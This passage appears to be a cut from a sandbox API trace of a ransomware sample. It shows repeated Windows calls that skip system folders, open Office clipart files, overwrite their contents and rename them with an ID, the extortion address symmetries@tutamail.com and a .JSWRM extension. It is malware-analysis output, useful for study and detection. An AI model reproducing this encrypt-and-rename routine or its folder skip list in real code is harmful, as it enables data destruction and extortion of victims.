ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27a4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00458_.WMF", cAlternateFileName="")) returned 1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2=".") returned 1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="..") returned 1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="...") returned 1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="windows") returned -1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="recovery") returned -1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="perflogs") returned -1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="documents and settings") returned 1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="system volume information") returned -1 [0091.435] lstrcmpiW (lpString1="NA00458_.WMF", lpString2="msocache") returned 1 [0091.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00458_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00458_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00458_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0091.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00458_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00458_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00458_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0091.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0091.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0091.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0091.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.443] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10148) returned 1 [0091.443] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27a0) returned 0x24d210 [0091.444] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27a0, lpOverlapped=0x0) returned 1 [0091.446] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.446] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27a0, lpOverlapped=0x0) returned 1 [0091.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.446] CloseHandle (hObject=0x314) returned 1 [0091.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0091.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0091.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0091.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0091.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0091.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.447] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00458_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00458_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0091.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0091.448] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00462_.WMF", cAlternateFileName="")) returned 1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2=".") returned 1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="..") returned 1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="...") returned 1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="windows") returned -1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="recovery") returned -1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="perflogs") returned -1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="documents and settings") returned 1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="system volume information") returned -1 [0091.448] lstrcmpiW (lpString1="NA00462_.WMF", lpString2="msocache") returned 1 [0091.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0091.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00462_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00462_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00462_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0091.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0091.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00462_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00462_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00462_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0091.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0091.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0091.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0091.448] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.449] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20332) returned 1 [0091.449] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f60) returned 0x24d210 [0091.449] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4f60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4f60, lpOverlapped=0x0) returned 1 [0091.452] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.452] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4f60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4f60, lpOverlapped=0x0) returned 1 [0091.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.452] CloseHandle (hObject=0x314) returned 1 [0091.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0091.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0091.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0091.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0091.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0091.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00462_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00462_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0091.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0091.453] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc10, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00487_.WMF", cAlternateFileName="")) returned 1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2=".") returned 1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="..") returned 1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="...") returned 1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="windows") returned -1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="recovery") returned -1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="perflogs") returned -1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="documents and settings") returned 1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.453] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="system volume information") returned -1 [0091.454] lstrcmpiW (lpString1="NA00487_.WMF", lpString2="msocache") returned 1 [0091.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0091.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00487_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00487_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00487_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0091.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0091.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00487_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00487_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00487_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0091.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.455] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3088) returned 1 [0091.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc10) returned 0x23fc98 [0091.455] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc10, lpOverlapped=0x0) returned 1 [0091.457] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.457] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc10, lpOverlapped=0x0) returned 1 [0091.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.457] CloseHandle (hObject=0x314) returned 1 [0091.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0091.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0091.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0091.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0091.457] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0091.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0091.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00487_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00487_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0091.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0091.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.458] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x938, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00494_.WMF", cAlternateFileName="")) returned 1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2=".") returned 1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="..") returned 1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="...") returned 1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="windows") returned -1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="recovery") returned -1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="perflogs") returned -1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="documents and settings") returned 1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="system volume information") returned -1 [0091.458] lstrcmpiW (lpString1="NA00494_.WMF", lpString2="msocache") returned 1 [0091.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0091.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00494_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00494_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00494_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0091.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00494_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.459] 